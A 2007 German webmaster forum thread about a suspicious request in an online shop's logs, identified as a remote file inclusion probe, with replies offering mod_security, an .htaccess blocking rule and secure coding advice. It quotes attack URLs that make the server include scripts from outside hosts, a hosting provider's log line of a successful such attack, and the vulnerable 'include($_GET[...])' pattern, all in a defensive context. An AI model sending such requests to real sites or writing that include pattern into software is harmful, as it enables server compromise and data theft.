Was ist das hinter meiner URL ?

Beitrag von **glow** » 17.10.2007, 16:08

Hallo

ich habe einen Onlineshop und kann sehen wer gerade Online und auf was für eine Seite er sich gerade befindet. Jetzt habe ich gesehen das einer auf folgender Seite wäre //index.php?seite=https://jasperforge.org/cache/id.txt? das gibt es in meinen Shop nicht.
Weiß jemand was das bedeutet ?

Danke

von **Anzeige von ABAKUS** »

Beitrag von **lingxmedia** » 17.10.2007, 16:27

Das habe ich auch manchmal.

Bei mir kommt es daher, dass ich eine alte Seite vom Netz genommen habe und die Domain auf meinen Shop umgeleitet habe. Auf einmal steht da denn z.B. index.php?pageid=3, obwohl solche Strings im Shop nicht vorkommen.

Einige Besucher haben wohl diesen alten Link gebookmarkt und kommen so über diesen String auf die Seite.

Beitrag von **Pompom** » 17.10.2007, 16:38

Ruf mal die Seite
https://jasperforge.org/cache/id.txt
auf, dann weißt du mehr.

Das ist ein Script/User, der versucht, deinen Server zu hacken.
Sonst nichts.

Beitrag von **glow** » 17.10.2007, 17:08

Pompom hat geschrieben:Ruf mal die Seite
https://jasperforge.org/cache/id.txt
auf, dann weißt du mehr.

Das ist ein Script/User, der versucht, deinen Server zu hacken.
Sonst nichts.

Na Super, wie kann ich mich davor schützen ?

Beitrag von **Pompom** » 17.10.2007, 17:14

Gar nicht, bzw. mit sicheren Applikationen, die vorher überprüfen, was includiert wird und von wo es includiert wird.

Beitrag von **glow** » 17.10.2007, 17:16

Pompom hat geschrieben:Gar nicht, bzw. mit sicheren Applikationen, die vorher überprüfen, was includiert wird und von wo es includiert wird.

Sorry, aber da mit kann ich garnichts anfangen. Gibt es ein Programm etc. ?

Beitrag von **Pompom** » 17.10.2007, 17:18

id.txt ist ein Script, mit dessen Hilfe versucht wird, auf deinem Server in einer PHP-Anwendung Schwachstellen zu finden.

Beitrag von **Racker** » 18.10.2007, 08:32

Wenn du einen eigenen Server hast, kannst du mit mod_security deinen Server vor solchen Angriffen schützen. Zumindest block mod_security, wenn es richtig eingestellt ist, die meißten Script-Kiddies ab.
Aber 100% Schutz gibt es nicht.
https://www.modsecurity.org/

Rules für mod_security
https://www.gotroot.com/mod_security+rules

Racker

Beitrag von **smart** » 18.10.2007, 22:22

@ Glow mach mal diesen Code in deine .htaccess Datei

Code: Alles auswählen

RewriteCond %&#123;REQUEST_URI&#125;?%&#123;QUERY_STRING&#125; &#40;.*&#41;http&#58;//&#40;.*&#41; &#91;NC&#93;
RewriteRule ^.*$ - &#91;F&#93;

Beitrag von **800XE** » 19.10.2007, 08:44

glow hat geschrieben:
Pompom hat geschrieben:Ruf mal die Seite
https://jasperforge.org/cache/id.txt
auf, dann weißt du mehr.

Das ist ein Script/User, der versucht, deinen Server zu hacken.
Sonst nichts.
Na Super, wie kann ich mich davor schützen ?

wenn es bei dir kein

Code: Alles auswählen

include &#40; $_GET&#91;'seite'&#93; &#41;;

gibt, brauchst du dich nicht schützen, dann ist der Hackangriff wirkungslos

Niemals GET (oder auch POST) Variablen für einen Include nutzen
Und auch nicht einfach in SQL Abfragen einbauen
google.com/search?ie=UTF8&q=SQL%20Injection

Beitrag von **workershop** » 19.10.2007, 17:35

Mit solchen Idioten hatte ich letzte Woche auch zu tun:

Sehr geehrter Herr Schmidt,

wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer Zugriff auf Ihre Daten erhalten konnte.

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

Es handelt sich um das Script
"/language/lang_german/lang_main_album.php", welches über den Parameter "phpbb_root_path" die Ausführung beliebigen Codes erlaubt:

66.178.22.202 - - [10/Oct/2007:20:22:57 +0200] "POST //language/lang_german/lang_main_album.php?phpbb_root_path=https://itfand
alucia.es/images.txt? HTTP/1.0" 200 6540 www.erotikversand69.de "https://www.erotikversand69.de//languag ... _album.php
?phpbb_root_path=https://itfandalucia.es/images.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "-"

Die in dem Verzeicnis befindlichen Scripte sind augenscheinlich alle trojanisiert worden. Aus diesem Grund haben wir das Verzeicnis gesperrt.
Ebenfalls manipuliert wurden anscheinend alle PHP-Dateien in Ihrem $HOME
(ctime: Oct 10 20:26:16 2007), welche wir ebenfalls gesperrt haben. Die Scripte sollten sämtliche entfernt werden.

Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten Software zu informieren, z.B. über entsprechende Announce-Mailinglisten oder Foren des Herstellers. Insbesondere gilt dies auch für die Komponenten von Drittherstellern der verwendeten Applikationen. Diese sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates teilweise auch Lücken geschlossen, die nicht in den Release-Notes der Software verzeichnet sind. Verwenden Sie lediglich Programme aus vertrauenswürdigen Quellen.

Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender Artikel ebenfalls von Interesse für Sie sein:
https://hilfe-center.1und1.de/server/ro ... ity/4.html

Ich habe danach gleich mal das ganze Script gelöscht, und auf die neue phpbb Version umgestellt.

Beitrag von **800XE** » 20.10.2007, 06:43

workershop hat geschrieben:trojanisiert

Ergebnisse 1 - 10 von ungefähr 1.340
Meinten Sie: tyrannisiert ( ungefähr 69.300 )

trojanisiert?
was bedeutet trojanisiert?

Ist "Troja" darin richtig, oder so falsch wie im Trojaner?

Es war einmal ein Pferd
Ein Pferd in Troja, das erst vor Troja stand, dann in Troja stand

Dann kammen aus dem Pferd welche, die keine Trojaner waren und später gab es keine Trojaner mehr

Also, wenn man einen sogenanten Trojaner hat, dann ist nicht der sogenante Trojaner der Trojaner sondern man selbst ist der Trojaner ..... bzw der Bürgermeister, König oder Präsident der Trojaner (= Herrscher über System und Festplatte, vorrausgesetzt man hat kein FritzChip-DRM )

was bedeutet trojanisiert?
hacken wurde letztens mehr verboten als es schon war .....
... gibt es keine Hacker mehr, sind das jetzt Trojanisierer?

</nurso Philosophisch>

Beitrag von **Ice Man** » 20.10.2007, 10:37

@ workershop

Du hast scheinbar ein phpbb+ Forum, dafür gibts ein Sicherheits Update.

Beitrag von **glow** » 20.10.2007, 23:54

smart hat geschrieben:@ Glow mach mal diesen Code in deine .htaccess Datei
Code: Alles auswählen
RewriteCond %&#123;REQUEST_URI&#125;?%&#123;QUERY_STRING&#125; &#40;.*&#41;http&#58;//&#40;.*&#41; &#91;NC&#93;
RewriteRule ^.*$ - &#91;F&#93;

Hallo

meine aktuelle .htaccess Datei sieht so aus

# -----------------------------------------------------------------------------------------
# $Id: .htaccess,v 1.2 2004/01/02 08:57:56 fanta2k Exp $
#
# XT-Commerce - community made shopping
# https://www.xt-commerce.com
#
# Copyright (c) 2003 XT-Commerce
# -----------------------------------------------------------------------------------------
# based on:
# (c) 2000-2001 The Exchange Project
# (c) 2002-2003 osCommerce (.htaccess,v 1.1 2002/07/21); www.oscommerce.com
# (c) 2003 nextcommerce (.htaccess,v 1.1 2003/09/06); www.nextcommerce.org
#
# Released under the GNU General Public License
# -----------------------------------------------------------------------------------------
# This is used with Apache WebServers
#
# The following makes adjustments to the SSL protocol for Internet
# Explorer browsers
#
# For this to work, you must include the parameter 'Limit' to the
# AllowOverride configuration
#
# Example:
#
#<Directory "/usr/local/apache/htdocs">
# AllowOverride Limit
#</Directory>
#
# 'All' with also work. (This configuration is in your
# apache/conf/httpd.conf file)www
#php_flag register_globals off
<IfModule mod_setenvif.c>
<IfDefine SSL>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

Ist die so in Ordnung und wenn ja wo setze ich das andere hin, einfach unten drunter oder wie ?

Beitrag von **smart** » 21.10.2007, 02:15

RewriteEngine On
RewriteCond %{REQUEST_URI}?%{QUERY_STRING} (.*)http://(.*) [NC]
RewriteRule ^.*$ - [F]

fügst du nach

downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

ein.

Leuft mod-rewrite auf deinen Server?

Das fügst du also ein läst das mal hoch und rufst dann deinedomain.de mit den code schnipsel index.php?Site=blabla.txt das du in deinen ersten Post angegeben hast auf und sagst was passiert. Wenn da eine 403 Forbidden kommt funktionierts. fürs erste .......

Dann schaust du mal wann der liebe Herr auf deiner Seite war IP, etc.

Grüße